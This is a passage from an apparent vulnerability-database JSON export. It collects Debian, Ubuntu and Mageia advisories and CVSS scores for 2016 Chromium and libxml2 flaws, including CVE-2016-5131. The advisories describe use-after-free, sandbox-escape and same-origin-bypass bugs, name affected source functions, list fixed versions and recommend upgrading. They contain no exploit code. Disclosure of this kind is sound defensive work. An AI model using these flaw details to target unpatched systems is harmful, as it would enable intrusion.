"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2022-07-21T05:54:43", "id": "OSV:DLA-691-1", "href": "https://osv.dev/vulnerability/DLA-691-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2023-05-02T16:06:38", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3637-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nJuly 31, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2016-1704 CVE-2016-1705 CVE-2016-1706 CVE-2016-1707\n CVE-2016-1708 CVE-2016-1709 CVE-2016-1710 CVE-2016-1711\n CVE-2016-5127 CVE-2016-5128 CVE-2016-5129 CVE-2016-5130\n CVE-2016-5131 CVE-2016-5132 CVE-2016-5133 CVE-2016-5134\n CVE-2016-5135 CVE-2016-5136 CVE-2016-5137\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2016-1704\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1705\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1706\n\n Pinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\n\n Adam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\n\n ChenQin a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\n\n Mariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\n\n Mariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\n\n cloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\n\n A same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\n\n Jeonghoon Shin discovered a memory corruption issue in the v8 javascript\n library.\n\nCVE-2016-5130\n\n Widih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\n\n Nick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\n\n Ben Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\n\n Patch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\n\n Paul Stone discovered an information leak in the Proxy Auto-Config\n feature.\n\nCVE-2016-5135\n\n ShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136\n\n Rob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\n\n Xiaoyin Liu discovered a way to discover whether an HSTS web side had been\n visited.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-31T21:08:37", "type": "debian", "title": "[SECURITY] [DSA 3637-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1704", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-31T21:08:37", "id": "DEBIAN:DSA-3637-1:68841", "href": "https://lists.debian.org/debian-security-announce/2016/msg00215.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:26:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3637-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nJuly 31, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2016-1704 CVE-2016-1705 CVE-2016-1706 CVE-2016-1707\n CVE-2016-1708 CVE-2016-1709 CVE-2016-1710 CVE-2016-1711\n CVE-2016-5127 CVE-2016-5128 CVE-2016-5129 CVE-2016-5130\n CVE-2016-5131 CVE-2016-5132 CVE-2016-5133 CVE-2016-5134\n CVE-2016-5135 CVE-2016-5136 CVE-2016-5137\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2016-1704\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1705\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-1706\n\n Pinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\n\n Adam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\n\n ChenQin a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\n\n Mariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\n\n Mariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\n\n cloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\n\n A same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\n\n Jeonghoon Shin discovered a memory corruption issue in the v8 javascript\n library.\n\nCVE-2016-5130\n\n Widih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\n\n Nick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\n\n Ben Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\n\n Patch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\n\n Paul Stone discovered an information leak in the Proxy Auto-Config\n feature.\n\nCVE-2016-5135\n\n ShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136\n\n Rob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\n\n Xiaoyin Liu discovered a way to discover whether an HSTS web side had been\n visited.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-31T21:08:37", "type": "debian", "title": "[SECURITY] [DSA 3637-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1704", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-31T21:08:37", "id": "DEBIAN:DSA-3637-1:92B2C", "href": "https://lists.debian.org/debian-security-announce/2016/msg00215.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:10:04", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3744-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 23, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2016-4658 CVE-2016-5131\nDebian Bug : 840553 840554\n\nSeveral vulnerabilities were discovered in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. A remote attacker\ncould provide a specially crafted XML or HTML file that, when processed\nby an application using libxml2, would cause a denial-of-service against\nthe application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-23T18:31:42", "type": "debian", "title": "[SECURITY] [DSA 3744-1] libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2016-12-23T18:31:42", "id": "DEBIAN:DSA-3744-1:AE7DC", "href": "https://lists.debian.org/debian-security-announce/2016/msg00328.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T15:57:27", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3744-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 23, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2016-4658 CVE-2016-5131\nDebian Bug : 840553 840554\n\nSeveral vulnerabilities were discovered in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. A remote attacker\ncould provide a specially crafted XML or HTML file that, when processed\nby an application using libxml2, would cause a denial-of-service against\nthe application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-23T18:31:42", "type": "debian", "title": "[SECURITY] [DSA 3744-1] libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2016-12-23T18:31:42", "id": "DEBIAN:DSA-3744-1:D44DC", "href": "https://lists.debian.org/debian-security-announce/2016/msg00328.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-23T21:47:36", "description": "Package : libxml2\nVersion : 2.8.0+dfsg1-7+wheezy7\nCVE ID : CVE-2016-4658 CVE-2016-5131\n\nCVE-2016-4658\n Namespace nodes must be copied to avoid use-after-free errors.\n But they don't necessarily have a physical representation in a\n document, so simply disallow them in XPointer ranges.\n\nCVE-2016-5131\n The old code would invoke the broken xmlXPtrRangeToFunction.\n range-to isn't really a function but a special kind of\n location step. Remove this function and always handle range-to\n in the XPath code.\n The old xmlXPtrRangeToFunction could also be abused to trigger\n a use-after-free error with the potential for remote code\n execution.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n2.8.0+dfsg1-7+wheezy7.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-31T17:09:55", "type": "debian", "title": "[SECURITY] [DLA 691-1] libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2016-10-31T17:09:55", "id": "DEBIAN:DLA-691-1:EF9E0", "href": "https://lists.debian.org/debian-lts-announce/2016/10/msg00048.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-06-03T15:48:46", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * oxide-qt \\- Web browser engine for Qt (QML plugin)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial \nof service (application crash) or execute arbitrary code. (CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the \norigin of IPC messages to the plugin broker process. A remote attacker \ncould potentially exploit this to bypass sandbox protection mechanisms. \n(CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a \ndeferred frame. A remote attacker could potentially exploit this to bypass \nsame origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during a \ndetach operation on a DocumentLoader object. A remote attacker could \npotentially exploit this to bypass same origin restrictions. \n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer process crash, or execute \narbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API interceptors \nfrom modifying a store target without setting a property. A remote \nattacker could potentially exploit this to bypass same origin \nrestrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer process crash, or execute \narbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. A remote attacker could \npotentially exploit this to spoof the currently displayed URL. \n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer process crash, or execute \narbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly implement \nthe Secure Contexts specification during decisions about whether to \ncontrol a subframe. A remote attacker could potentially exploit this to \nbypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during proxy \nauthentication. A machine-in-the-middle attacker could potentially exploit this \nto spoof a proxy authentication login prompt. (CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium \ndoes not ensure that URL information is restricted to a scheme, host and \nport. A remote attacker could potentially exploit this to obtain sensitive \ninformation. (CVE-2016-5134)\n\nIt was discovered that Blink does not consider referrer-policy information \ninside an HTML document during a preload request. A remote attacker could \npotentially exploit this to bypass Content Security Policy (CSP) \nprotections. (CVE-2016-5135)\n\nIt was discovered that the Content Security Policy (CSP) implementation in \nBlink does not apply http :80 policies to https :443 URLs. A remote \nattacker could potentially exploit this to determine whether a specific \nHSTS web site has been visited by reading a CSP report. (CVE-2016-5137)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-08-05T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5137"], "modified": "2016-08-05T00:00:00", "id": "USN-3041-1", "href": "https://ubuntu.com/security/notices/USN-3041-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T15:46:18", "description": "## Releases\n\n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * libxml2 \\- GNOME XML library\n\nIt was discovered that libxml2 incorrectly handled format strings. If a \nuser or automated system were tricked into opening a specially crafted \ndocument, an attacker could possibly cause libxml2 to crash, resulting in a \ndenial of service. This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 \nLTS, and Ubuntu 16.04 LTS. (CVE-2016-4448)\n\nIt was discovered that libxml2 incorrectly handled certain malformed \ndocuments. If a user or automated system were tricked into opening a \nspecially crafted document, an attacker could cause libxml2 to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2016-4658)\n\nNick Wellnhofer discovered that libxml2 incorrectly handled certain \nmalformed documents. If a user or automated system were tricked into \nopening a specially crafted document, an attacker could cause libxml2 to \ncrash, resulting in a denial of service, or possibly execute arbitrary \ncode. (CVE-2016-5131)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-16T00:00:00", "type": "ubuntu", "title": "libxml2 vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4448", "CVE-2016-4658", "CVE-2016-5131"], "modified": "2017-03-16T00:00:00", "id": "USN-3235-1", "href": "https://ubuntu.com/security/notices/USN-3235-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-06-03T15:12:47", "description": "Multiple unspecified vulnerabilities in chromium before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2016-1705) The PPAPI implementation in Chromium before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc. (CVE-2016-1706) The Chrome Web Store inline-installation implementation in the Extensions subsystem in Chromium before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site. (CVE-2016-1708) Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in sfntly before 2016-06-10, as used in Chromium before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font. (CVE-2016-1709) The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Chromium before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. (CVE-2016-1710) WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Chromium before 52.0.2743.82, does not disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. (CVE-2016-1711) Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Chromium before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element. (CVE-2016-5127) objects.cc in V8 before 5.2.361.27, as used in Chromium before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. (CVE-2016-5128) V8 before 5.2.361.32, as used in Chromium before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code. (CVE-2016-5129) content/renderer/history_controller.cc in Chromium before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site. (CVE-2016-5130) The Service Workers subsystem in Chromium before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element. (CVE-2016-5132) Chromium before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream. (CVE-2016-5133) net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Chromium before 52.0.2743.82 does not ensure that URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763. (CVE-2016-5134) WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Chromium before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"\" element. (CVE-2016-5135) Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Chromium before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion. (CVE-2016-5136) The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy (CSP) implementation in Blink, as used in Chromium before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution. (CVE-2016-5137) \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-08-03T10:57:01", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-3763", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-08-03T10:57:01", "id": "MGASA-2016-0274", "href": "https://advisories.mageia.org/MGASA-2016-0274.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T16:28:09", "description": "Use-after-free error could lead to crash (CVE-2016-4658). Use-after-free vulnerability in libxml2 through 2.9.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function (CVE-2016-5131). libxml2 2.9.4 and earlier does not offer a flag directly indicating that the current document 